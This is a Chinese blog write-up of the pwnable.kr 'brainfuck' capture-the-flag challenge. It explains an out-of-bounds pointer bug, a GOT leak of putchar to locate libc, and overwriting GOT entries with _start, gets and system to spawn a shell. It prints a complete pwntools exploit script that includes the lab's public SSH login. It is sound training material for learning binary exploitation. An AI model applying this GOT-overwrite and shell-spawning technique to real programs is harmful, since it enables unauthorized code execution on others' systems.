pwnable之brainfuck

最新推荐文章于 2024-08-19 10:49:04 发布
最新推荐文章于 2024-08-19 10:49:04 发布
阅读量476 收藏
点赞数
分类专栏: pwnable
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pwd_3/article/details/78137804
版权

问题分析

程序没有对p的访问空间做限制,导致可以任意内存读写,在.bss段前面是存放got的地方。基本思路是:先读取got中的值泄露libc地址,再根据bf_libc.so计算其他函数偏移。接下来是写,覆盖原有got值为指定函数地址来getshell

遇到问题

最开始想覆盖putchar的got值为system的地址,但无法控制system的参数。思维僵化
真的是,怎么就没想到覆盖成__start的地址,再跑一遍main,就有其他函数来利用了
另外一个问题是"mov     eax, ds:p", 地址还是值的问题( ▼-▼ )

具体方法

1.'<'上移使其指向got_putchar,'.'将实际地址打印出来,4个字节
2.利用libc.so计算其他函数的地址
3.'<','>'这两个操作移动p,分别指向putchar,memset,fgets的got,利用‘,’进行写操作,分别将它们的got值覆盖为‘_start’,'gets','system'
4.将'/bin/sh'传过去

solv.py

from pwn import *
import sys

if int(sys.argv[1]) == 1:
    sh = ssh(host='pwnable.kr',user='asm',password='guest',port=2222)
    p = sh.remote('0',9001)
    #p = remote('pwnable.kr',9001)
    libc = ELF("bf_libc.so")
    elf = ELF("bf")
    pass
else:
    p = process("./bf")
    libc = ELF("libc.so.6")
    elf = ELF("bf")
        #gdb.attach(p)
context.log_level = 'debug'
context.arch = "i386"
got_putchar = elf.got['putchar']
got_memset = elf.got['memset']
got_fgets = elf.got['fgets']
log.info("got memset:{0} ;got putchar:{1}".format(hex(got_memset),hex(got_putchar)))
addr_p = 0x804A0A0
addr_main = 0x080484e0
offset_p = addr_p - got_putchar
p.recvuntil("type some brainfuck instructions except [ ]\n")
payload = '<' * offset_p + '.' + '.>.>.>.>' + '<' * 4 + ',>,>,>,>' + '<' * (got_putchar - got_memset + 4) + ',>,>,>,>' + '<' * (got_memset - got_fgets + 4) + ',>,>,>,>' + '.'
p.sendline(payload)
p.recv(1)
addr_putchar = u32(p.recv(4))
log.info("addr putchr:{}".format(hex(addr_putchar)))
addr_sys = addr_putchar - libc.symbols['putchar'] + libc.symbols['system']
addr_gets = addr_putchar - libc.symbols['putchar'] + libc.symbols['gets']
log.info("addr system:{}".format(hex(addr_sys)))
p.send(p32(addr_main) + p32(addr_gets) + p32(addr_sys))
p.recv()
p.sendline('/bin/sh\x00')
p.interactive()
pwd_3
关注
专栏目录
简单的brainfuck解码工具
06-15
简单的brainfuck解码工具,将brainfuck编码输入即可获得明文。
brainfuckbrainfuck编码php
02-15
1. **BrainFuck编程语言**:BrainFuck由 Urban Müller 在1993年发明,以其简单的8个命令字符著称:`< > + - . , [ ]`。这些字符分别代表移动数据指针、增加/减少当前单元格的值、输出字符、输入字符、开始循环和...
pwnable.kr】 brainfuck
weixin_30530523的博客
08-03 153
pwnable.kr第二关第一题: ========================================= Download : http://pwnable.kr/bin/bfDownload : http://pwnable.kr/bin/bf_libc.so Running at : nc pwnable.kr 9001 =======================...
Brainfuck 开源项目教程
最新发布
gitblog_00553的博客
08-19 482
Brainfuck 开源项目教程 brainfuckCollection of BF interpreters/translators in C/C++/ASM/JS/Python/Rust + others项目地址:https://gitcode.com/gh_mirrors/br/brainfuck 项目介绍 Brainfuck 是一个极简的编程语言,由瑞士物理学生 Urban Müller...
pwnable brain fuck(bss段的用途)
九层台
09-26 660
题目链接传送门 这里题目跟网鼎杯线下赛的一个pwn有些相似。 输入一些字符可以控制一个指针,可以向这个指针指向的地址处写数据。 首先要知道bss段里面有什么。 在这道题里面的p指针的更高地址处是stdin,stdout,stderr然后是函数的got表,这里可以控制指针p泄露和修改got表。 #coding=utf-8 from pwn import * p=0x0804a0a0 putcha...
pwnable 笔记 Rookiss - brain fuck - 150 pt
HiTaQini
12-15 3101
终于打到第二关了... 这题考察GOT覆写
Brainfuck
Tiko.T的部落格
04-25 3988
Brainfuck 是一门非常简单甚至可以说是最简单的编程语言,wikipedia。 它的语法由一个8个字符的字符集组成,即&gt;&lt;+=.,[]八个字符。brainfuck的模型还包括一个以字节为单位、被初始化为零的数组、一个指向该数组的指针(初始时指向数组的第一个字节)、以及用于输入输出的两个字节流。 这八个字符每一个都是一条指令: &gt; 指针加一 &lt; ...
bf-ide:在线的Brainfuck IDE
05-08
**bf-ide: 在线 Brainfuck IDE** 在线的 Brainfuck IDE,名为 "bf-ide",是一个专为 Brainfuck 编程语言设计的集成开发环境(IDE)。Brainfuck 是一种极简主义的编程语言,其设计目的是教育人们关于计算机硬件工作...
[brainfuck解密工具](完整源代码程序)
08-02
brainfuck解密 C/C++/asm/Javascript/Python/Rust+others中的脑洞解释器/翻译器的集合。JS版本包含一个交互式“IDE”,可以在纯JS或Wasm引擎之间进行选择。有两种JIT实现:在C++和Rust中。 Contents Intro Programs ...
Brainfuck和ook!解码脚本
07-31
Brainfuck和ook!解码python脚本,方便离线使用
python-brainfuck:用Python编写的Brainfuck解释器
03-21
python-brainfuck 用Python编写的Brainfuck解释器。 要求 类似于UNIX的操作系统 吉特 Python 本地安装 HTTPS $ git clone https://github.com/aminnairi/python-brainfuck $ cd python-brainfuck SSH协议 $ git ...
pwn训练 pwnable.kr brainfuck
doudoudedi
09-08 369
这是一道pwnable第二模块的题目 这道题开始看不懂emem,发现是一个brainfuck的解释器发现有对内存可以读写控制的函数还有一个野指针emem就是他了开始发现只要把memset函数覆写成为gets然后输入/bin/sh再是将fgets覆写成为system 第一步泄露putchar函数的真实地址然后算出libc基址 计算出system,gets的地址 在将putchar写成main 然后就...
pwnable.kr - brain fuck
加号减减号的博客
03-06 851
题目简介 分析 writeup 题目简介 Brain fuck 是 pwnable.kr 第二阶段的第一道题,考察了覆些 GOT 表等知识点。题目信息如下: 分析 将下载得到的 bf 文件拖进 IDA 中查看,发现程序主要由 main 函数以及 do_brainfuck 函数组成,且没有开启 PIE。 main 函数如下: int __cdecl main...
pwnable BrainFuck,GOT表重写
nibiru_holmes的博客
03-10 1200
题目链接:http://pwnable.kr/play.php BrainFuck是什么鬼,百度一下..... Brainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英语中是脏话,这种语言有时被称为brainf*ck或brainf**k,甚至被简称为BF。 其实就是闲着没事做出来的一种语言。 看看
[翻译]Brainfuck
weixin_33938733的博客
12-06 317
一个只有8条指令的图灵完备编程语言 Brainfuck是Urban Müller的邪恶创造,他的目的似乎是为他之前在Amiga OS 2.0上写的一个最小的编译器创建一个图灵完备语言。他的编译器只有240 bytes大小(但是他在后来改进了它,-- 他告诉我一件事情,他设法努力将编译器弄到200字节以下) 我最初开始接触Brainfuck是因为我对在X86 Linux写程序的兴趣....
pwnable.kr brainfuck writeup
jmp esp
03-28 1791
题目I made a simple brain-fuck language emulation program written in C. The [ ] commands are not implemented yet. However the rest functionality seems working fine. Find a bug and exploit it to get a
BrainFuck--只有八种指令、符合图灵完全思想的编程语言
weixin_30364147的博客
11-27 258
官方网站: http://www.muppetlabs.com/~breadbox/bf/ BrainFuck, (An Eight-Instruction Turing-Complete Programming Language), 这个语言本身的语言模型很简单, 有一个byte指针, 有一个初始化为0长度为30000 bytes的数组, byte指针可以在数组内任意移动, 支持下面的八种操...
Brainfuck--PyFuck
u011053762的博客
09-20 878
Main.pyfrom PyFuck import PyFuck from sys import exitchoice = 0print ("Welcome to Michalios13 BrainFuck Interpreter !")while choice not in ["1", "2"]: choice = input("Do you want to :\n1)Run Code ?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值